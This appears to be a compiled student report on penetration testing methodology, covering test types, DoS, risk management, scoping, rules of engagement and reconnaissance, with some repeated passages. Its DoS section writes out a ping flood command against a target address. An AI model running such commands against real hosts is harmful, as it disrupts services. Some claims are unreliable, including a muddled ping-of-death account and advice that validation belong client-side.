Final Print
Final Print
Final Print
1.1 Introduction 1.2 Types of Penetration Testing 1.3 Penetration Testing Risks 1.4 Social Engineering 1.5 Rules of Engagement
Penetration Testing
Penetration tests are a great way to identify vulnerabilities that exists in a system or network that has an existing security measures in place. A penetration test usually involves the use of attacking methods conducted by trusted individuals that are similarly used by hostile intruders or hackers. Depending on the type of test that is conducted, this may involve a simple scan of an IP addresses to identify machines that are offering services with known vulnerabilities or even exploiting known vulnerabilities that exists in an unpatched operating system. The results of these tests or attacks are then documented and presented as report to the owner of the system and the vulnerabilities identified can then be resolved. Bear in mind that a penetration test does not last forever. Depending on the organization conducting the tests, the time frame to conduct each test varies. A penetration test is basically an attempt to breach the security of a network or system and is not a full security audit. This means that it is no more than a view of a systems security at a single moment in time. At this time, the known vulnerabilities, weaknesses or misconfigured systems have not changed within the time frame the penetration test is conducted. Penetration testing is often done for two reasons. This is either to increase upper management awareness of security issues or to test intrusion detection and response capabilities. It also helps in assisting the higher management in decision-making processes. The management of an organization might not want to address all the vulnerabilities that are found in a vulnerability assessment but might want to address its system weaknesses that are found through a penetration test. This can happen as addressing all the weaknesses that are found in a vulnerability assessment can be costly and most organizations might not be able allocate the budget to do this. Penetration tests can have serious consequences for the network on which they are run. If it is being badly conducted it can cause congestion and systems crashing. In the worst case scenario, it can result in the exactly the thing it is intended to prevent. This is the compromise of the systems by unauthorized intruders. It is therefore vital to have consent from the management of an organization before conducting a penetration test on its systems or network. Penetration test, occasionally pentest, is a method of evaluating the security of a computer system or network by simulating an attack from malicious outsiders (who do not have an authorized means of accessing the organization's systems) and malicious insiders (who have some level of authorized access). The process involves an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, both known and unknown hardware or software flaws, and
operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker and can involve active exploitation of security vulnerabilities. Security issues uncovered through the penetration test are presented to the system's owner. Effective penetration tests will couple this information with an accurate assessment of the potential impacts to the organization and outline a range of technical and procedural countermeasures to reduce risks. Web applications are widely used to provide functionality that allows companies to build and maintain relationships with their customers. The information stored by web applications is often confidential and, if obtained by malicious attackers, its exposure could result in substantial losses for both consumers and companies. Recognizing the rising cost of successful attacks, software engineers have worked to improve their processes to minimize the introduction of vulnerabilities. In spite of these improvements, vulnerabilities continue to occur because of the complexity of the web applications and their deployment configurations. The continued prevalence of vulnerabilities has increased the importance of techniques that can identify vulnerabilities in deployed web applications. One such technique, penetration testing, identifies vulnerabilities in web applications by simulating attacks by a malicious user. Although penetration testing cannot guarantee that all vulnerabilities will be identified in an application, it is popular among developers for several reasons: (i) it generally has a low rate of false vulnerability reports since it discovers vulnerabilities by exploiting them; (ii) it tests applications in context, which allows for the discovery of vulnerabilities that arise due to the actual deployment environment of the web application; and it provides concrete inputs for each vulnerability report that can guide the developers in correcting the code. Although individual penetration testers perform a wide variety of tasks, the general process can be divided into three phases: information gathering, attack generation, and response analysis. Figure 1 shows a high-level overview of these three phases. In the first phase, information gathering, penetration testers select a target web application and obtain information about it using various techniques, such as automated scanning, web crawling, and social engineering. The results of this phase allow penetration testers to perform the second phase, attack generation, which is the development of attacks on the target application. Often this phase can be automated by customizing wellknown attacks or by using automated attack scripts. Once the attacks have been executed, penetration testers perform response analysisthey analyze the applications responses to determine whether the attacks were successful and prepare a final report about the discovered vulnerabilities. During information gathering, the identification of an applications input vectors (IVs)points in an application where an attack may be introduced, such as user-input fields and cookie fieldsis of particular importance. Better information about an applications IVs generally leads to more thorough penetration testing of the application. Currently, it is common for penetration testers to use automated web crawlers to identify the IVs of a web application. A web crawler visits the HTML pages generated by a web application and analyzes each page to identify potential IVs. The main limitation of this approach is that it is incomplete because web crawlers are typically unable to visit all of the pages of a web application or must provide certain values to the web application in order to cause additional HTML pages to be shown. Although penetration testers can make use of the information discovered by web crawlers, the incompleteness of such information results in a potentially large number of vulnerable IVs remaining undiscovered. Another challenging aspect of penetration testing is determining whether an attack is successful. This task is complex because a successful attack often produces no observable behavior (i.e. it may produce a side effect that is not readily visible in the HTML page produced by the web application) and requires manual, time-consuming analysis to be identified. Existing approaches to automated response analysis tend to suffer from imprecision because they are based on simple heuristics.
Fig-1
The services offered by penetration testing firms span a similar range, from a simple scan of an organization's IP address space for open ports and identification banners to a full audit of source code for an application. Penetration testing is one of the oldest methods for assessing the security of a computer system. The idea behind penetration testing methodologies is that the penetration tester should follow a pre-scripted format during test as dictated by the methodology. A penetration testing methodology was proposed in this research. It is also important to consider a policy that should be followed by both the tester and the client to reduce financial and confidential disparities, and to bring conformity to the operations between the both parties, so this research suggests a policy that should be followed by penetration testers and clients of the penetration tests. Penetration testing is increasingly used by organizations to assure the security of Information systems and services, so that security weaknesses can be fixed before they get exposed. But when the Penetration test is performed without a well planned and professional approach it can result to what it is supposed to prevent from. In order to protect company data, companies often take measures to guarantee the availability, confidentiality and integrity of data or to ensure access for authorized persons only.
Outsourcing
Outsourcing penetration testing can be a very costly exercise and one that you might want to only perform once a year. The problem with most networks is that they are constantly changing. People move equipment around the office or between office locations and also install software on PCs and servers, so penetration testing only gives you a snapshot of compromised systems at that moment in time to give you a guide. You also have to be extra vigilant when employing a security testing company.You need to make sure they have liability insurance! Do they come with certified security credentials? (4) Do they bait and switch ? (5) or do they employ real life hackers which have their own agenda ?
Some industries and types of data are regulated and must be handled securely (like the financial sector, or credit-card data). In this case your regulator will insist on a penetration test as part of a certification process. You may be a product vendor (like a web developer), and your client may be regulated, so will ask you to have a penetration test performed on their behalf. You may suspect (or know) that you have already been hacked, and now want to find out more about the threats to your systems, so that you can reduce the risk of another successful attack.
You may simply think it is a good idea to be proactive, and find out about the threats to your organization in advance.
Business Advantages
1. Can be fast (and therefore cheap) 2. Requires a relatively lower skill-set than source code review 3. Tests the code that is actually being exposed 4. Saves hundreds of thousands of dollars in remediation and notification costs by avoiding network downtime and/or averting a single breach 5. Lowers the costs of security audits by providing comprehensive and detailed factual evidence of an enterprises ability to detect and mitigate risks 6. Creates a heightened awareness of securitys importance at the CXO management level 7. Provides unassailable information usable by audit teams gathering data for regulatory compliance 8. Provides a strong basis for supporting approval of larger security budgets 9. Provides support to evaluate the effectiveness of other security products, either deployed or under evaluation, to determine their ROI
I T / Technical Benefits1. Allows IT staff to quickly and accurately identify real and potential vulnerabilities without being overburdened with numerous false positive indicators 2. Allows IT staff to fine-tune and test configuration changes or patches to proactively eliminate identified risks 3. Assists IT in prioritizing the application of patches for reported known vulnerabilities 4. Enhances the effectiveness of an enterprises SVM program
5. Provides vulnerability perspectives from both outside and within the enterprise 6. It is a force multiplier when it comes to overall impact on IT resources and significantly enhances the knowledge and skill level of IT staff
Blackbox Testing
Blackbox security testing is more commonly referred to as ethical hacking. Blackbox testing primarily focuses upon the externally facing components of an application or networkwhat a potential hacker might see from the Internet. In a blackbox testing scenario, analysts are typically provided with little or no information about the target environment. Usually only a target websites address (URL) or a range of internet addresses (IP addresses) are provided, although in the case of website or application targets, login credentials are supplied. In this way, blackbox testing more accurately simulates a real-world attack by a malicious hacker possessing zero or limited knowledge of the target site or network. Just like a hacker, analysts scan the target environment searching for all exploitable attack vectors. While BLACKBOX testing is a relatively quick and affordable way to determine if an Internet-facing application or network is susceptible to various forms of attack, it comes with certain limitations. A blackbox test constitutes the bare minimum level of security analysis. Blackbox testing wont identify every vulnerability that becomes exploitable once a hacker has breached the perimeter. Nor is a blackbox test going to yield an exhaustive list of the individual instances for each vulnerability that becomes exposed once a hacker has gained initial access to the target environment. Finally, blackbox testing is conducted for a limited duration, whereas true hackers have no such time restrictions, which is a significant difference given current Intrusion Prevention System (IPS) technologies. Therefore, the benefits and limitations of blackbox penetration testing need to be understood this is not a
comprehensive test of website, application or network security, but rather an initial assessment of that systems perimeter integrity.
Graybox Testing
Graybox penetration testing is also sometimes referred to as informed penetration testing or assisted blackbox testing. This method of testing is similar to blackbox penetration testing, however the analysts are given detailed information about the application or network, such as network architecture diagrams or access to the application source code. These details, aid analysts in finding and verifying vulnerabilities they might have missed with a blackbox test. Gray box penetration testing provides a more thorough assessment of the target site or networks security, discovering vulnerabilities that are only visible once inside that environment, rather than just those facing the Internet. In a graybox application penetration test, the analyst tests the strength of the existing security controls as an insider, looking for vulnerabilities from the perspective of a trusted user with detailed knowledge of the environment. Upon successful login, the analyst sends malicious input to the application manually or by using special tools to determine how the application responds:
Does the application provide an entry-point to other resources, servers, or databases? Does the application provide useful information to take advantage of other attack vectors?
Does the application allow a user to perform an unauthorized escalation of their access?
Another value of gray box testing is that analysts are able to work directly with network and/or development teams to pinpoint the exact location of vulnerabilities - the actual lines in the source code or insecure network settings and configurations. Conversely in a blackbox test, the vulnerability could be demonstrated but its source might go unidentified. With a graybox test, a client company receives detailed information on the individual instances of vulnerabilities and their locations with both blackbox and graybox testing, AsTech provides remediation recommendations and risk ratings based on the unique risk evaluation criteria most appropriate for each client.
An effective security program integrates multiple approaches, combining penetration testing with other types of assessment, such as application security code review, architecture review, and threat modeling. When performed in combination, these assessments provide a more comprehensive picture of the overall security posture of the target environment.
Environment Attacks
Software does not execute in isolation. It relies on any number of binaries and code-equivalent modules, such as scripts and plug-ins. It may also use configuration information from the registry or file system as well as databases and services that may reside anywhere. Each of these environmental interactions may be the source of a security breach and therefore must be tested. There are also a number of important questions you must ask about the degree of trust that your application has in these interactions, including the following: How much does the application trust its local environment and remote resources? Does the application put sensitive information in a resource (for instance, the registry) that can be read by other applications? Does it trust every file or library it loads without verifying the contents? Can an attacker exploit this trust to force the application to do his bidding? In addition to the trust questions, penetration testers should watch for DLLs that might be faulty or have been replaced (or modified) by an attacker, binaries, or files with which the application interacts that are not fully protected by access control lists (ACLs) or are otherwise unprotected. Testers must also be on the lookout for other applications that access shared memory resources or store sensitive data in the registry or in temporary files. Finally, testers must consider factors that create system stress, such as a slow network, low memory, and so forth, and determine the impact of these factors on security features. Environment attacks are often conducted by rigging an insecure environment and then executing the application within that environment to see how it responds. This is an indirect form of testing; the attacks are waged against the environment in which the application is operating. Now let's look at direct testing.
Input Attacks
In penetration testing, the subsets of inputs that come from untrusted sources are the most important. These include communication paths such as network protocols and sockets, exposed remote functionality
such as DCOM, remote procedure calls (RPCs) and Web services, data files (binary or text), temporary files created during execution, and control files such as scripts and XML, all of which are subject to tampering. Finally, UI controls allowing direct user input, including logon screens, Web front ends, and the like, must also be checked. Specifically, we will want to determine whether input is properly controlled: are good inputs allowed in and bad ones (such as long strings, malformed packets, and so forth) kept out? Suitable input checking and file parsing are critical. You'll need to test to see whether dangerous input can be entered into UI controls, and find out what happens when it is. This includes special characters, encoded input, script fragments, format strings, escape sequences, and so forth. You'll need to determine whether long strings that are embedded in packets fields or in files and are capable of causing memory overflow will get through. Corrupt packets in protocol streams are also a concern. You must watch for crashes and hangs and check the stack for exploitable memory corruption. Finally, you must ensure that such things as validation and error messages happen in the right place (client-side rather than server side) as a proper defense against bad input. Input attacks really are like lobbing grenades against an application. Some of them will be properly parried and some will cause the software to explode. It's up to the penetration team to determine which are which and initiate appropriate fixes.
Denial of service
is the primary example of this category but certainly not the most dangerous.
Denial of service attacks can be successful when developers have failed to plan for a large number of users (or connections, files, or whatever inputs cause some resource to be taxed to its limit). However, there are far more insidious logical defects that need to be tested. For example, information disclosure can happen when inputs that drive error messages and other generated outputs reveal exploitable information to an attacker. One practical example of such data that you should always remove is any hardcoded test accounts or test APIs (which are often included in internal builds to aid test automation). These can
provide easy access to an attacker. Two more tests you should run are to input false credentials to determine if the internal authorization mechanisms are robust, and choose inputs that vary the code paths. Often one code path is secure but the same functionality can be accessed in a different way, which could inadvertently bypass some crucial check.
Ping of death
Ping of death is an another type of DOS attack that can shut down systems, and causing a great harm to the system. Default ICMP echo packet size of 64 bytes, many computer system could not handle the incoming packet larger the default packet size. In ping of death attack an attacker generates ICMP echo packets of over 65,535 bytes that is illegal. If you ping to a host like ping 192.168.1.1 What would happen if you do this thing like ping 192.168.0.1 -l 65500 -n 10000 This, in effect, pings the target machine 192.168.0.1 continuously [10,000 times] with 64 kBs of data.
Distributed DOS
Distributed denial of service attack or DDOS attack is a attack in which an attacker uses several machine to launch DOS attack that's why it is difficult to handle. In DDOS attack multiple compromised system that already infected are uses against the victim computer. In this case it is difficult to track the attacker because this attack generates from several IP addresses, and it is difficult to block.
Overall Defense
There are no any single way to prevent DOS attack because of it varying nature, there are some effective way to avoid and reduce to effect of this attack.
Install and maintain anti-virus software. Install a firewall, and configure it to restrict traffic coming into and leaving your computer (Firewall ,Firewall 2)
Don't Be Deterred
Penetration testing is very different from traditional functional testing; not only do penetration testers lack appropriate documentation, but they also must be able to think like users who intend to do harm. This point is very importantdevelopers often operate under the assumption that no reasonable user would execute a particular scenario, and therefore decline a bug fix. But you really can't take chances like that. Hackers will go to great lengths to find vulnerabilities and no trick, cheat, or off-the-wall test case is out of bounds. The same must be true for penetration testers as well.
Risk is a measure of probability and severity of unwanted effects on software development projects.
The current strategies for evaluating or validating IT systems and network security are focused on examining the results of security assessments (including red-teaming exercises, penetration testing, vulnerability scanning, and other means of probing defenses for weaknesses in security), and on examining the building blocks, processes, and controls (for example: auditing business processes and procedures for security policy compliance, assessing the quality of security in infrastructure components, and reviewing system development and administration processes for security best practices).
Risk
Every organization has a mission. In this digital era, as organizations use automated information technology (IT) systems1 to process their information for better support of their missions, risk management plays a critical role in protecting an organizations information assets, and therefore its mission, from IT-related risk.
program. The principal goal of an organizations risk management process should be to protect the organization and its ability to perform their mission, not just its IT assets. Therefore, the risk management process should not be treated primarily as a technical function carried out by the IT experts who operate and manage the IT system, but as an essential management function of the organization. Risk is the net negative impact of the exercise of a vulnerability, considering both the probability and the impact of occurrence. Risk management is the process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level. This guide provides a foundation for the development of an effective risk management program, containing both the definitions and the practical guidance necessary for assessing and mitigating risks identified within IT systems. The ultimate goal is to help organizations to better manage IT-related mission risks.
where UE stands for an unwanted event (risk factor); P(UE) is the probability that UE occurs; I(UE) stands for the impact (or cost) due to the occurrence of UE. As an example, we can consider the following situation: UE = {Resignation of a senior analyst}, I(UE) = (1.a) {6 months delay} and P(UE) = 0.25 then: V(UE) = 6 * 0.25 = 1.5 (months)
Identify: Includes the identification of the internal and external sources of risk through a suitable
taxonomy (Higuera, 1996) (SEI, 2002), as depicted in Table 1. Risk Identification involves stakeholders and depends on the project context.
Analyze: Aims at understanding when, where, and why risk might occur, through direct queries to
stakeholders about the probability and impact of risk elements. The prior probability is evaluated. This is the probability that an event (e.g., project delay) could happen before the project starts. This is calculated through prior information.
Plan: In order to establish a strategy to avoid or mitigate the risk, decisions have to be made. In this
stage, contingency plans are stated as well as the related triggering thresholds. Risk-controlling actions are defined and selected. Figure1: Risk Management Process.
Identify
Analyze
Plan
Document Communicate
Control
Monitoring
Handle
Handle: The planned actions are carried out if the risk occurs.
Monitoring: This is a continuous activity that watches the status of the project, and checks
performance indicators (e.g., quality indicators, for instance the number of defects per size unit). In this stage, data concerning the risk trend is gathered.
Control: It appraises the corrections to be taken on risk mitigation plan in case of deviations. If the
indicators show an increase over the fixed threshold, a contingency plan is triggered. In our opinion, this stage should deal with the posterior probability because events have already occurred; that is, one tries to figure out whether an unwanted event actually had an impact on project objectives.
Document and Communicate: This stage can be truly considered as the core of RM; in fact, all
other stages refer to Documentation and Communication for enabling information exchange.
allowing access to any systems or any restricted area to anyone at all. Reinforcing strict security practices such as these could one day mean a corporate America that is impervious to social engineering attacks... but that is nowhere visible, even in the distant future. 1. 2. 3. 4. Will the client provide e-mail addresses of personnel that we can attempt to social engineer? Will the client provide phone numbers of personnel that we can attempt to social engineer? Will we be attempting to social engineer physical access, if so: How many people will be targeted?
It should be noted that as part of different levels of testing the questions for business unit managers systems administrators and help desk personnel may not be required. However, feel free to use the following questions as a guide.
Validate Ranges
It is imperative that before you start to attack the targets you validate that they are in fact owned by the customer you are performing the test against. Think of the legal consequences you may run into if you start attacking a machine and successfully penetrate it only to find out later down the line that the machine actually belongs to another organization (such as a hospital or government agency). To verify that the targets actually belongs to your customer, you can perform a whois against the targets. To perform a whois against the target you can either use a whois tool on the web such as Internic or a tool on your computer like the following:
user@unix:~$ whois example.com Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: example.COM Registrar: REGISTER.COM, INC. Whois Server: whois.register.com Referral URL: http://www.register.com Name Server: NS1.EXAMPLE.COM Name Server: NS3.EXAMPLE.COM
Status: clientTransferProhibited Updated Date: 17-mar-2009 Creation Date: 05-mar-2000 Expiration Date: 05-mar-2016 Registrant: Domain Discreet ATTN: example.com Rua Dr. Brito Camara, n 20, 1 Funchal, Madeira 9000-039 PT Phone: 1-902-7495331 Email: [email protected]
Registrar Name....: Register.com Registrar Whois...: whois.register.com Registrar Homepage: www.register.com Domain Name: example.com Created on..............: 2000-03-05 Expires on..............: 2016-03-05 Administrative Contact: Domain Discreet ATTN: example.com Rua Dr. Brito Camara, n 20, 1 Funchal, Madeira 9000-039 PT Phone: 1-902-7495331 Email: [email protected]
Technical Contact: Domain Discreet ATTN: example.com Rua Dr. Brito Camara, n 20, 1 Funchal, Madeira 9000-039 PT Phone: 1-902-7495331 Email: [email protected]
Cloud Services
The single biggest issue with testing cloud service is there is data from multiple different organizations stored on one physical medium. Often the security between these different data domains is very lax. The cloud services provider needs to be alerted to the testing and needs to acknowledge that the test is occurring and grant the testing organization permission to test. Further, there needs to be a direct security contact within the cloud service provider that can be contacted in the event that security vulnerability is discovered that can impact the other cloud customers. Some cloud providers have specific procedures for penetration testers to follow, and may require request forms, scheduling or explicit permission from them before testing can begin. This may seem like an onerous amount of approval for testing, however the risks are to great to the tester otherwise.
ISP
Verify the ISP terms of service with the customer. In many commercial situations the ISP will have specific provisions for testing. Review these terms carefully before launching an attack. There are situations where ISPs will shun and block certain traffic that is deemed to be malicious. This may be acceptable to the customer, it may not. Either way it needs to be clearly communicated with the customer prior to testing.
Web Hosting
This is the same as the other tests, the scope and timing of the test needs to be clearly communicated with the web hosting provider. Also, when communicating with the direct customer you need to clearly articulate you are only testing for web vulnerabilities. You will not be testing for vulnerabilities that can lead to a compromise of the underlying OS infrastructure.
MSSPs
Managed Security Service Providers also may need to be notified of testing. Specifically, you will need to notify the provider when you are testing systems and services that they own. However, there are times when you would not notify the MSSP. It may not be in the best interests of the test to notify the MSSP when you are testing the response time of the MSSP. As a general rule of thumb, any time a device or services explicitly owned by the MSSP is being tested they need to be notified.
DoS Testing
Stress testing or Denial of Service testing should be discussed before you start your engagement. It can be one of those topics that many organizations are uncomfortable with due to the potentially damaging nature of the testing. If an organization is only worried about the confidentiality or integrity of their data, stress testing may not be necessary; however, if the organization is also worried about the availability of their services, then the stress testing should be conducted in a non-production environment that is identical to their production environment.
Goals
Every penetration test should be goal oriented. This is to say we are testing to identify specific vulnerabilities that lead to a compromise of the business or mission objectives of the customer. It is not about finding un-patched systems. It is about identifying risk that will adversely impact the organization.
Primary
The primary goal of a test should not be driven by compliance. There are a number of different justifications for this reasoning. First, compliance does not equal security. While it should be understood that many organizations undergo testing because of compliance it should not be the main goal of the test. For example, you may be hired to test as part of a PCI requirement. There are many companies that process credit card information. However, the traits that make your target organization unique and viable in a competitive market would have the greatest impact to the target organization if they were compromised. Compromising credit cards would be bad. Compromising the email addresses and credit card numbers of all the target organizations customers would be catastrophic.
Secondary
The secondary goals are the ones that are directly related to compliance. Usually these are tied to the primary goals very tightly. For example, getting the credit cards is the secondary goal. Tying that breach of data to the business or mission drivers of the organization is the primary goal. Think of it like this: secondary goals mean something for compliance and IT. Primary goals get the attention of the C-Os.
Business Analysis
Before performing a penetration test it is a good idea to define what level of security maturity your customer is at. There are a number of organizations that choose to jump directly into a penetration test without any level of security maturity. For these customers it is often a good idea to perform a vulnerability analysis first. There is absolutely no shame in doing Vulnerability Analysis (VA) work. Remember, the goal is identifying risks to your target organization. It is not about being a tester. If a company is not ready for a full penetration test, they will most likely get far more value out of a good VA than a penetration test. Establish with the customer what information about the systems they want you to know in advance. You may also want to ask them for information about vulnerabilities they already know about; this will save you time and save them money if you don't have to re-discover and report on what
they already knew. A full or partial white-box test may bring the customer more value than a black-box test, if it isn't absolutely required by compliance. If you are asked to pentest an internal network (and you really should be -- assume the attacker started on the inside or is already there), you will need to gather more information about scope.
Timeline
You should have a clear timeline for your test. While in scope you defined start and end times, now it is time to define everything in between. We understand that the timeline will change as the test progresses. However, having a rigid timeline is not the goal of creating a timeline. Rather, a timeline at the beginning of a test will allow you and your customer to more clearly identify the work that is to be done and the people that will be responsible for the work. We often use GANTT charts and Work breakdown structure to define the work and the amount of time that each specific section of the work will take. Seeing the schedule broken down like this helps you identify the resources that need to be allocated and it helps the customer identify possible roadblocks that many be encountered during testing.
Evidence Handling
When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests. Never hand out USB sticks with test reports out at security conferences. And whatever you do, don't re-use a report from another customer engagement as a template! It's very unprofessional to leave references to another organization in your document.
When tracking this information be sure to collect time information. For example, if a scan is detected you should be notified and note what level of scan you were performing at the time.
In this chapter, section 2.1 Steps of Penetration testing, section 2.2 pentest tools, 2.3 Advantages and Disadvantages of pentest , graph
2.1 Steps
of Penetration testing
Pre-engagement Interactions Intelligence Gathering Threat Modeling Vulnerability Analysis Exploitation Post Exploitation Reporting
Pre-engagement Interactions
This phase defines all the pre-engagement activities and scope definitions.
Scoping
Scoping is arguably one of the more important and often overlooked components of a penetration test. Sure, there are lots of books written about the different tools and techniques that can be used for gaining access to a network. However, there is very little on the topic of how to prepare for a test. This can lead to troubles for the testers in areas like Scope Creep, legal issues and disgruntled customers that will never have you back. The goal of this section is to give you the tools and techniques to avoid these pitfalls. Much of the information contained in this section is the result of the experiences of the testers who wrote it. Many of the lessons are ones which we have learned the hard way.
Scoping is specifically tied to what you are going to test. This is very different from covering how you are going to test. We will be covering How To Test in the rules of engagement section. If you are a customer looking for penetration test we strongly recommend going to the General Questions section of this document. It covers the major questions that should be answered before a test begins. Remember, a penetration test should not be confrontational. It should not be an activity to see if the tester can "hack" you. It should be about identifying the business risk associated with and attack. To get maximum value, make sure the questions in this document are covered. Further, as the Scoping activity progresses, a good testing firm will start to ask additional questions tailored to your organization.
How to Scope
One of the key components for scoping an engagement is trying to figure out exactly how you as a tester are going to spend your time. For example, a customer could want you to test 100 IP addresses and only want to pay you $100,000 for the effort. This roughly breaks down to $1K per IP. Now, would that cost structure hold true if they had one mission critical application they wanted you to test? Some testers fall into this trap when interacting with a customer to scope a test. Unfortunately, there is going to be some customer education in the process. We are not WalMart. Our costs are not linear. So, with that being said, there will be some engagements where you will have a wide canvas of IP addresses to test and choose from to try and access a network as part of a test. There will also be highly focused tests where you will spend weeks (if not months) on one specific application. The key is knowing the difference. To have that level of understanding you will have to know what it is the customer is looking for, even when they don't know exactly how to phrase it.
What happens if you do not need the 20% overhead? It would be incredibly unethical to simply pocket the cash. Rather, find ways to provide the customer with additional value for the test. Walk the companys security team through the steps you took to exploit the vulnerability, provide an executive summary if it was not part of the original deliverable list, or spend some additional time trying to crack the vulnerability that was elusive during the initial testing. Another component of the metrics of time and testing is that your project has to have a definitive drop dead dates. All good projects have a beginning and an end. Your test should as well. You will need to have a signed Statement of Work specifying the work and the hours required if youve reached the specific date the testing is to end, or if any additional testing or work is requested of you after that date. Some testers have a difficult time doing this because they feel they are being too much of a pain when it comes to cost and hours. However, it has been the experience of the author that if you provide exceptional value for the main test the customer will not balk at paying you for additional work.
Rules of Engagement
While the scope defines what it is you are supposed to test, the rules of engagement defines how testing is to occur. These are two different aspects that need to be handled independently from each other. Timeline You should have a clear timeline for your test. While in scope you defined start and end times, now it is time to define everything in between. We understand that the timeline will change as the test progresses. However, having a rigid timeline is not the goal of creating a timeline. Rather, a timeline at the beginning of a test will allow you and your customer to more clearly identify the work that is to be done and the people that will be responsible for the work. We often use GANTT charts and Work breakdown structure to define the work and the amount of time that each specific section of the work will take. Seeing the schedule broken down like this helps you identify the resources that need to be allocated and it helps the customer identify possible roadblocks that many be encountered during testing. There are a number of free GANTT chart tools available on the Internet. find one that works best for you and use it heavily when developing a testing road map. If nothing else, many mangers resonate with these tools and it may be an excellent medium for communicating with the upper management of a target organization.
Locations It is also important to discuss with the customer where the locations are that they will need you to travel to for testing. This could be something as simple as identifying local hotels. And, it may be something as complex as identifying the laws of a specific target country. Sometimes an organization has multiple locations and you will need to identify a few sample locations for testing. In these situations try to avoid having to travel to all customer locations. Many times there are VPN connections available for testing. Disclosure of Sensitive Information While one of your goals may be to gain access to sensitive information, you may not actually want to view it or download it. This seems odd to newer testers, however, there are a number of situations where you do not want the target data on your system. For example, PHI. Under HIPAA this data needs to be protected. In may situations your testing system may not have a firewall or AV running on it. This would be a good situation where you would not want PII anywhere near your computer. So the question becomes how can I prove I had access without getting the data? There are a number of different ways you can prove access without showing data. For example, you can display a database schema, you can show permissions of systems you have accessed, you can show the files without showing the content. The level of paranoia you want to employ for your tests is something you will need to decide with your customer. Either way you will want to scrub your test machine of results in between tests. This also applies to the report templates you use as well. As a special side note, if you encounter illegal data (i.e. child porn) immediately notify law enforcement, then your customer in that order. Do not notify the customer and take direction from them. Simply viewing child pornography is a crime. Evidence Handling When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests. Never hand out USB sticks with test reports out at security conferences. And whatever you do, don't re-use a report from another customer engagement as a template! It's very unprofessional to leave references to another organization in your document. Regular Status Meetings Throughout the testing process it is critical to have regular meetings with the customer informing them of the overall progress of the test. These meetings should be held daily and should be as short as possible. We generally see our meetings cover three very simple things: plans, progress and problems.
For plans you should describe what it is you are planning on doing that day. The reason for this is to make sure you will not be testing during a change or an outage. For progress you should inform what you have completed since the previous meeting. For problems you should communicate with the customer any issues that will impact the overall timing of the test. If there are specific people identified to rectify the situation you should not discuss the solution to the problem during the status meeting. Take the conversation offline. The goal of the status meeting is to have a 30 minute or less meeting and take any longer conversations offline with only the specific individuals required to solve the issue. Time of the Day to Test There are better times of the day for testing than others for many customers. Unfortunately, this can mean many late nights for the penetration testers. Be sure that times of testing are clearly communicated with the customer before testing begins. Dealing with Shunning There are times where shunning is perfectly acceptable and there are times where it may not fit the spirit of the test. For example, if your test is to be a full black-box test where you are testing not only the technology, but the capabilities of the target organizations security team, shunning would be perfectly fine. However, when you are testing a large number of systems in coordination with the target organization's security team it may not be in the best interests of the test to shun your attacks. Permission to Test This is quite possibly the single most important document you can receive when testing. This documents the scope and it is where the customer signs off on the fact that they are going to be tested for security vulnerabilities and their systems may be compromised. Further, it should clearly state that testing can lead to system instability and all due care will be given by the tester to not crash systems in the process. However, because testing can lead to instability the customer shall not hold the tester liable for any system instability or crashes. It is critical that testing does not begin until this document is signed by the customer. In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. Legal Considerations Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed.
For example, any VOIP calls captured in the course of the penetration test may be considered wiretapping in some areas.
When tracking this information be sure to collect time information. For example, if a scan is detected you should be notified and note what level of scan you were preforming at the time.
Intelligence Gathering
This section defines the Intelligence Gathering activities of a penetration test. The purpose of this document is to provide a (living?) document designed specifically for the pentester performing reconnaissance against a target (typically corporate, military, or related). The document details the thought process and goals of pentesting reconnaissance, and when used properly, helps the reader to produce a highly strategic plan for attacking a target.
What it is
Intelligence Gathering is performing reconnaissance against a target to gather as much information as possible to be utilized when penetrating the target during the vulnerability assessment and exploitation phases. The more information you are able to gather during this phase, the more vectors of attack you may be able to use in the future. Open source intelligence (OSINT) is a form of intelligence collection management that involves finding, selecting, and acquiring information from publicly available sources and analyzing it to produce actionable intelligence.
Why do it
We perform Open Source Intelligence gathering to determine various entry points into an organization. These entry points can be physical, electronic, and/or human. Many companies fail to take into account what information about themselves they place in public and how this information can be used by a determined attacker. On top of that many employees fail to take into account what information they place about themselves in public and how that information can be used to to attack them or their employer.
What is it not
OSINT may not be accurate or timely. The information sources may be deliberately/accidentally manipulated to reflect erroneous data, information may become obsolete as time passes, or simply be incomplete. It does not encompass dumpster-diving or any methods of retrieving company information off of physical items found on-premises.
Target Selection
Identification and Naming of Target
When approaching a target organization it is important to understand that a company may have a number of different Top Level Domains (TDLs) and auxiliary businesses. While this information should have been discovered during the scoping phase it is not all that unusual to identify additional servers domains and companies that may not have been part of the initial scope that was discussed in the pre-engagement phase. For example a company may have a TDL of .com. However, they may also have .net .co and .xxx. These may need to be part of the revised scope, or they may be off limits. Either way it needs to be cleared with the customer before testing begins. It is also not all that uncommon for a company to have a number of sub-companies underneath them. For example General Electric and Proctor and Gamble own a great deal of smaller companies.
Consider any Rules of Engagement limitations
At this point it is a good idea to review the Rules of Engagement. It is common for these to get forgotten during a test. Sometimes, as testers we get so wrapped up in what we find and the possibilities for attack that we forget which IP addresses, domains and networks we can attack. Always, be referencing the Rulles of Engagement to keep your tests focused. This is not just important from a legel perspective, it is also important from a scope creep perspective. Every time you get sidetracked from the core objectives of the test it costs you time. And in the long run that can cost your company money.
Consider time length for test
The amount of time for the total test will directly impact the amount of Intelligence Gathering that can be done. There are some tests where the total time is two to three months. In these engagements a testing company would spend a tremendous amount of time looking into each of the core business units and personal of the company. However, for shorter crystal-box style tests the objectives may be far more tactical. For example, testing a specific web application may not require you to research the financial records of the company CEO.
Consider end goal of the test Consider what you want to accomplish from the Information Gathering phase Make the plan to get it
Open Source Intelligence (OSINT) takes three forms; Passive, Semi-passive, and Active.
